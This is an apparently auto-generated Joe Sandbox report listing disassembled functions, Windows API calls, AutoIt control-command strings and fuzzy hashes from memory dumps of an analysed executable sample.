Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ecdc7a938d0fab39ae0fa67aebdc5878cd473e4eb0e1d40cf9a0db8ac3b5336e
Instruction ID: e9a39894c74f4f97762ad0a8630637fdbee9bff6b6a32aa8c6f5100b65ea71bc
Opcode Fuzzy Hash: ecdc7a938d0fab39ae0fa67aebdc5878cd473e4eb0e1d40cf9a0db8ac3b5336e
Instruction Fuzzy Hash: 0AF0823510522DABDB229FA4CC88FEA776CFF08361F008269F909DA181D7709D44CBA1

Function 003B81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003B8309), ref: 003B81E0
CloseHandle.KERNEL32(?,?,003B8309), ref: 003B81F2

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: c72ea4f988f1d80960ba3056c0dae933d1cd36db393d548c4d741993953122e6
Instruction ID: d2f7ec27bc2ffa5e26c1be9fe06fc5de097a51c7feded5c05e2df67ac8001b00
Opcode Fuzzy Hash: c72ea4f988f1d80960ba3056c0dae933d1cd36db393d548c4d741993953122e6
Instruction Fuzzy Hash: 36E0E671011610AFE7672B74EC05D7777EDEF04315B14896DF55588470DB616C91DB10

Function 0038A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00388D57,?,?,?,00000001), ref: 0038A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0038A163

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8723645a10973f231d96ef33a92cbcdda9447381201735653944b5600148869a
Instruction ID: 9fc0a2891c899cf2d6d1949a25d3538415185ed22bc6b4ace57dc8f43b9fc39c
Opcode Fuzzy Hash: 8723645a10973f231d96ef33a92cbcdda9447381201735653944b5600148869a
Instruction Fuzzy Hash: 1BB09235054248AFCA122B91EC49B883F6CEB44BA2F404120F60D886A4CBA255508A91

Function 0038F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2199619d16f740ab76fb638b3abcf49d51b0caa7720228d85a1b1a6fa612c310
Instruction ID: 94cea69ebca3a010be17762b1c97f01544c36b5a603f033e90a408803e654f7f
Opcode Fuzzy Hash: 2199619d16f740ab76fb638b3abcf49d51b0caa7720228d85a1b1a6fa612c310
Instruction Fuzzy Hash: 1D32F521D29F414DD723A634D832336A64DAFB73D4F15D777F81AB5AA5EB29C8838200

Function 0039242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: decd6550ab92198d31e0cbbcb3af51534fdacd6af618eec7309e553489792ad1
Instruction ID: ca469b3330785ddba35e45bb9ffc5ad33f3aa83c9f95127ef46de4e3ccd8f1c9
Opcode Fuzzy Hash: decd6550ab92198d31e0cbbcb3af51534fdacd6af618eec7309e553489792ad1
Instruction Fuzzy Hash: BDB10260D2AF414DD72396398871336BB5CAFBB2C5F52D71BFC2A74E22EB2185838141

Function 003C4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003C4C4A

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: e0ea61ca6fde625e67a3e8a7ec91b9c5fd0c1c7c06a263481fa13fa00471ec24
Instruction ID: 0869fbb83f2e72c7301d3662373f34a0accd2865aaffd6d7fb0f6bf38823d6e8
Opcode Fuzzy Hash: e0ea61ca6fde625e67a3e8a7ec91b9c5fd0c1c7c06a263481fa13fa00471ec24
Instruction Fuzzy Hash: F6D05E9116520938ED2E0720AE7FFBA010CE300782FD1E24D7102CA0E1ECC09C405330

Function 003B87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003B8389), ref: 003B87D1

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 03347e4bede9531efaf88cc6c81895b00b487ef9b566c0ed51be88aa4e7d57fe
Instruction ID: 541b6b2f24b8e14358d83f7396721b263442b47654fd56005efedeff33904bad
Opcode Fuzzy Hash: 03347e4bede9531efaf88cc6c81895b00b487ef9b566c0ed51be88aa4e7d57fe
Instruction Fuzzy Hash: 2ED05E3226050EAFEF118EA4DC01EBE3B69EB04B01F408111FE15C50A1C7B5D835AB60

Function 0038A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0038A12A

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b073c756e92ecc296baa838702e8edc59671edab1e8e67f3e0e1b0f5f52250be
Instruction ID: bf7c1880107007591ae2039c9e61e98cffcde5d1b02fee211000810603d6b043
Opcode Fuzzy Hash: b073c756e92ecc296baa838702e8edc59671edab1e8e67f3e0e1b0f5f52250be
Instruction Fuzzy Hash: 1BA0113000020CAB8A022B82EC08888BFACEA002A0B008020F80C882228BB2A8208A80

Function 00E79978 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

Sk, xrefs: 00E799C9

Memory Dump Source

Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID: Sk
API String ID: 0-562419935
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 8003b7719acedc31ba269e87d73d8ecd34e136ba242f99acd070df4bd4c9f066
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: E601A478A00109EFDB48DF98C5909AEF7F5FF88310F208599E919A7306D730AE41DB80

Function 00378808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ecb3b411864700896b0c08094adabfcea3f5def49b58808b2743885ca84ad28
Instruction ID: 65c18eceeb6d7a82d877eee3cc1ca41ffa57d7473ae4fae47cbd75890446dc5a
Opcode Fuzzy Hash: 8ecb3b411864700896b0c08094adabfcea3f5def49b58808b2743885ca84ad28
Instruction Fuzzy Hash: 06222830A48546CBDF3B8B18C4987BC77A1FB41308F26C46AD64A8BD92DB78DD92C741

Function 003821C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 5242e599189f461e1a6de7c7a2e7a608dfcf9580c15bc5c6be906cf5e35a9e6a
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 73C184362052930ADB6F663A843413FFAA55EA27B131B47DDD8B3CB1D4EE10C969D720

Function 003825FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 5498737c918b1e34e90b3a72a3beeab4881fdaaf499d004d4fd30c258590ba76
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: E2C165322052930ADF6F563A843413FBAA55EA27B131B47EDE4B3DB1D5EE10C929D720

Function 00381978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 2b84ba12e3487ed2233d1c19762ab3b6109c4ac75c93119588f75b99806507e7
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 62C1843220529309DF2F5639C47413EBAA95EA27B131B47EDD4B3CB1D4EE20C96AD720

Function 00E79AE8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 3ecab91db3c0d0004e81d917c16e9a7bbd3ca20134d4c526e6823f61eddd97b5
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: AC41A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90

Function 00E799D8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 01dc5c49fe6f87746e89a0d270e36b6e6807f6eae3191c2ca3201404422385d5
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 3E019278A01209EFCB44DF98C5909AEF7F5FF48310F208599E809A7306E730AE41DB80

Function 00E78338 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 003E356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,003EF910), ref: 003E3627
IsWindowVisible.USER32(?), ref: 003E364B

Strings

GETLINECOUNT, xrefs: 003E38C6
EDITPASTE, xrefs: 003E395F
SHOWDROPDOWN, xrefs: 003E36E0
DELSTRING, xrefs: 003E3749
GETLINE, xrefs: 003E399B
SENDCOMMANDID, xrefs: 003E39DA
UNCHECK, xrefs: 003E3883
TABLEFT, xrefs: 003E3687
CHECK, xrefs: 003E386D
CURRENTTAB, xrefs: 003E36BD
TABRIGHT, xrefs: 003E369D
HIDEDROPDOWN, xrefs: 003E3700
FINDSTRING, xrefs: 003E3776
SETCURRENTSELECTION, xrefs: 003E37B6
GETCURRENTCOL, xrefs: 003E3928
ISENABLED, xrefs: 003E366B
ISVISIBLE, xrefs: 003E3637
GETCURRENTSELECTION, xrefs: 003E37E3
SELECTSTRING, xrefs: 003E3806
GETSELECTED, xrefs: 003E38A3
ISCHECKED, xrefs: 003E3839
GETCURRENTLINE, xrefs: 003E38ED
ADDSTRING, xrefs: 003E3716

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 0b80d67fe27a95432494df5dab739f885dd5c0bef7a9b0d47c4a25506298d15a
Instruction ID: 0f0448aa1331a45c2d916b896cde8ee8a7da4261f19692f38f30fcadce4595c2
Opcode Fuzzy Hash: 0b80d67fe27a95432494df5dab739f885dd5c0bef7a9b0d47c4a25506298d15a
Instruction Fuzzy Hash: A7D1CF702043509BCB0AEF11C45AAAE77E9AF85344F058569F8865F7E3CB35EE4ACB41

Function 003EA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 003EA630
GetSysColorBrush.USER32(0000000F), ref: 003EA661
GetSysColor.USER32(0000000F), ref: 003EA66D
SetBkColor.GDI32(?,000000FF), ref: 003EA687
SelectObject.GDI32(?,00000000), ref: 003EA696
InflateRect.USER32(?,000000FF,000000FF), ref: 003EA6C1
GetSysColor.USER32(00000010), ref: 003EA6C9
CreateSolidBrush.GDI32(00000000), ref: 003EA6D0
FrameRect.USER32(?,?,00000000), ref: 003EA6DF
DeleteObject.GDI32(00000000), ref: 003EA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 003EA731
FillRect.USER32(?,?,00000000), ref: 003EA763
GetWindowLongW.USER32(?,000000F0), ref: 003EA78E

Part of subcall function 003EA8CA: GetSysColor.USER32(00000012), ref: 003EA903
Part of subcall function 003EA8CA: SetTextColor.GDI32(?,?), ref: 003EA907
Part of subcall function 003EA8CA: GetSysColorBrush.USER32(0000000F), ref: 003EA91D
Part of subcall function 003EA8CA: GetSysColor.USER32(0000000F), ref: 003EA928
Part of subcall function 003EA8CA: GetSysColor.USER32(00000011), ref: 003EA945
Part of subcall function 003EA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003EA953
Part of subcall function 003EA8CA: SelectObject.GDI32(?,00000000), ref: 003EA964
Part of subcall function 003EA8CA: SetBkColor.GDI32(?,00000000), ref: 003EA96D
Part of subcall function 003EA8CA: SelectObject.GDI32(?,?), ref: 003EA97A
Part of subcall function 003EA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 003EA999
Part of subcall function 003EA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003EA9B0
Part of subcall function 003EA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 003EA9C5
Part of subcall function 003EA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003EA9ED

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 9d6e80baecc8bb005cbfbfca5b95eaa72f7e38d313b03dcfbda4bfd09cf97946
Instruction ID: 077a6ce94cf0156eafc80ccb246686e1501b28c34f4b342dcd8b29c20cb9d0ba
Opcode Fuzzy Hash: 9d6e80baecc8bb005cbfbfca5b95eaa72f7e38d313b03dcfbda4bfd09cf97946
Instruction Fuzzy Hash: C0918D72008795AFD7229F64DC48A5B7BBDFF89321F100B29F5629A1E0D7B0E944CB52

Function 00362C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00362CA2
DeleteObject.GDI32(00000000), ref: 00362CE8
DeleteObject.GDI32(00000000), ref: 00362CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00362CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00362D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0039C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0039C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0039C89D

Part of subcall function 00361B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00362036,?,00000000,?,?,?,?,003616CB,00000000,?), ref: 00361B9A

SendMessageW.USER32(?,00001053), ref: 0039C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0039C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0039C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0039C912

Strings

0, xrefs: 0039C731

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 986a822bce7ca011f216d48f7af6a3211f593fa79db41da865db71f2759db27f
Instruction ID: e26b407e7da92c6c6a05bc0dc00d1711e1c1aa01974e0e8128ca08820682128e
Opcode Fuzzy Hash: 986a822bce7ca011f216d48f7af6a3211f593fa79db41da865db71f2759db27f
Instruction Fuzzy Hash: 3D129D30614641EFDF22CF24C884BAABBE5BF45300F569569F895CB6A2C771EC42CB91

Function 003D74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 003D74DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003D759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003D75DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003D75ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003D7633
GetClientRect.USER32(00000000,?), ref: 003D763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003D7683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003D7692
GetStockObject.GDI32(00000011), ref: 003D76A2
SelectObject.GDI32(00000000,00000000), ref: 003D76A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003D76B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003D76BF
DeleteDC.GDI32(00000000), ref: 003D76C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003D76F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 003D770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003D7746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003D775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 003D776B
